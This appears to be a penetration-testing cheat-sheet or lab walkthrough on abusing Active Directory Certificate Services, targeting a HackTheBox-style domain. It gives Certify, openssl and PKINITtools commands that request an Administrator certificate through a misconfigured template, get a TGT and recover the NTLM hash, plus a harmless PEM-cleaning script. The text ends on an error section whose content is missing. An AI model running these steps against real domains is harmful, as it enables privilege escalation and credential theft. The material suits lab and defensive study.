AD CS

Certificate enrollment

Any authenticated domain user can request a certificate from the Enterprise Certificate Authority for every template on which they hold Enroll rights. What makes this an attack surface is template misconfiguration: Certify's find /vulnerable enumerates the templates the current user can enrol in and flags the dangerous ones, for example a template that allows the requester to supply the subject alternative name (ESC1), which is what the altname request further down relies on.

.\Certify.exe find /vulnerable

Certificate extraction

.\Certify.exe request /template:UserAuthentication /ca:dc.sequel.htb\sequel-DC-CA /altname:[email protected]
-----BEGIN RSA PRIVATE KEY-----
[...]
-----END CERTIFICATE-----

User persistence

The PEM output that Certify returns (private key and certificate in one blob) has to be converted to a PKCS#12 (.pfx) bundle before it can be used with Rubeus or imported directly into the Windows certificate store: a .pfx is a container that packages the certificate together with its private key, so everything needed to authenticate with it is in a single file. The openssl command below does the conversion and tags the key for the CSP that Rubeus expects. If a bundle produced with OpenSSL 3.x is rejected on the Windows side, re-export it with the -legacy option so that the older PBE algorithms are used instead of the AES/PBKDF2 defaults.

openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx
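Copying the PEM blob out of a Windows console often mangles it (CRLF line endings, a missing line, a status line in between), and openssl then fails with an unhelpful error. The script below is an added example, not part of the original page or of Certify: it extracts every PEM block from the pasted output, checks that each body base64-decodes and that the outer DER SEQUENCE length matches the decoded size (which catches a truncated paste that still decodes), rebuilds a clean key-plus-certificate PEM file and hands it to the openssl pkcs12 command above. The file names certify_output.txt, cert.pem and cert.pfx are assumptions, and the sample input is constructed from two tiny DER SEQUENCEs standing in for a real key and certificate.

```python
"""Added example: normalise the PEM blob Certify prints, verify both blocks survived the
copy/paste intact, and feed the result to the openssl pkcs12 export shown on the page.
File names below are assumptions; the sample input is constructed, not real Certify output."""
import base64
import binascii
import re
import subprocess
import sys
from pathlib import Path

# One PEM block: header, base64 body, matching footer. CRLF is tolerated (Windows console).
PEM_BLOCK = re.compile(
    r"-----BEGIN (?P<label>[A-Z ]+)-----\r?\n(?P<body>.*?)\r?\n-----END (?P=label)-----",
    re.DOTALL,
)
CSP = "Microsoft Enhanced Cryptographic Provider v1.0"


def _der_complete(der: bytes) -> bool:
    """True when the outer SEQUENCE length matches the decoded size.
    A truncated paste still base64-decodes, so this header check is what catches it."""
    if len(der) < 2 or der[0] != 0x30:
        return False
    first = der[1]
    if first < 0x80:                       # short-form length
        header, length = 2, first
    else:                                  # long form: 0x8N followed by N length bytes
        n = first & 0x7F
        if n == 0 or n > 4 or len(der) < 2 + n:
            return False
        header, length = 2 + n, int.from_bytes(der[2:2 + n], "big")
    return header + length == len(der)


def extract_pem_blocks(text: str) -> dict:
    """Return {label: DER bytes} for every PEM block in text; raise ValueError on damage."""
    blocks = {}
    for m in PEM_BLOCK.finditer(text):
        label = m.group("label")
        body = "".join(m.group("body").split())      # drop line breaks and stray whitespace
        try:
            der = base64.b64decode(body, validate=True)
        except binascii.Error as exc:
            raise ValueError(f"{label}: corrupt base64 body ({exc})") from exc
        if not _der_complete(der):
            raise ValueError(f"{label}: DER length mismatch, block is truncated")
        blocks[label] = der
    return blocks


def _to_pem(label: str, der: bytes) -> str:
    b64 = base64.b64encode(der).decode()
    lines = [b64[i:i + 64] for i in range(0, len(b64), 64)]
    return f"-----BEGIN {label}-----\n" + "\n".join(lines) + f"\n-----END {label}-----\n"


def bundle_for_openssl(text: str) -> str:
    """Rebuild an LF-only PEM file holding the key and the certificate, in that order."""
    blocks = extract_pem_blocks(text)
    key_label = next((l for l in ("RSA PRIVATE KEY", "PRIVATE KEY") if l in blocks), None)
    if key_label is None or "CERTIFICATE" not in blocks:
        raise ValueError("need both a private key block and a CERTIFICATE block")
    return "".join(_to_pem(label, blocks[label]) for label in (key_label, "CERTIFICATE"))


def is_valid_bundle(text: str) -> bool:
    try:
        bundle_for_openssl(text)
        return True
    except ValueError:
        return False


def openssl_pkcs12_argv(pem_path: str, pfx_path: str) -> list:
    """The conversion command from the page, as an argv list (no shell quoting problems)."""
    return ["openssl", "pkcs12", "-in", pem_path, "-keyex", "-CSP", CSP,
            "-export", "-out", pfx_path]


# Constructed sample: tiny DER SEQUENCEs stand in for a real key and certificate, wrapped the
# way a console paste looks on Windows (CRLF endings, an unrelated line between the blocks).
_FAKE_KEY = b"\x30\x03\x02\x01\x05"                 # SEQUENCE { INTEGER 5 }
_FAKE_CERT = b"\x30\x06\x02\x01\x01\x02\x01\x02"    # SEQUENCE { INTEGER 1, INTEGER 2 }
_CERT_B64 = base64.b64encode(_FAKE_CERT).decode()
SAMPLE_OUTPUT = (
    "-----BEGIN RSA PRIVATE KEY-----\r\n" + base64.b64encode(_FAKE_KEY).decode() + "\r\n"
    + "-----END RSA PRIVATE KEY-----\r\n"
    + "(constructed console noise line)\r\n"
    + "-----BEGIN CERTIFICATE-----\r\n" + _CERT_B64 + "\r\n"
    + "-----END CERTIFICATE-----\r\n"
)
# Same paste with the last two bytes of the certificate lost: still valid base64, wrong length.
TRUNCATED_OUTPUT = SAMPLE_OUTPUT.replace(_CERT_B64, base64.b64encode(_FAKE_CERT[:-2]).decode())

if __name__ == "__main__":
    src = Path(sys.argv[1] if len(sys.argv) > 1 else "certify_output.txt")   # assumed name
    Path("cert.pem").write_text(bundle_for_openssl(src.read_text()))
    subprocess.run(openssl_pkcs12_argv("cert.pem", "cert.pfx"), check=True)
```

Run it as python3 convert.py certify_output.txt after pasting Certify's output into that file; openssl will still prompt for the export password, and a ValueError from the script points at the exact block that was damaged in the paste rather than letting openssl fail later on an unreadable file.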

A Ticket Granting Ticket (TGT) can then be requested with Rubeus from the Kerberos Key Distribution Center (KDC) over PKINIT. The KDC authenticates the principal named in the certificate, so with an altname-controlled certificate the TGT is issued for that account rather than for the low-privileged user that performed the enrollment.

Similarly, the TGT can be obtained from Linux with gettgtpkinit.py (PKINITtools) by supplying the .pfx and the principal the certificate was issued to. The script writes the TGT to the specified ccache file and also prints the AS-REP encryption key, which is needed for the next step.

python3 gettgtpkinit.py sequel.htb/Administrator -cert-pfx ~/HTB/Machines/Escape/cert.pfx ticket.ccache -dc-ip 10.10.11.202

To use getnthash.py, point the KRB5CCNAME environment variable at the ccache file written in the previous step so that the tool picks the TGT up from there.

The AS-REP encryption key printed by gettgtpkinit.py is then passed to getnthash.py, which uses the TGT to request a user-to-user (U2U) service ticket for the same account, decrypts the PAC with that key and recovers the account's NTLM hash from the credential information the KDC embeds in the PAC for PKINIT logons (so that the user can still authenticate over NTLM).

Sometimes, the following error is obtained when using the PKINIT tools:

In that case, run the following command:
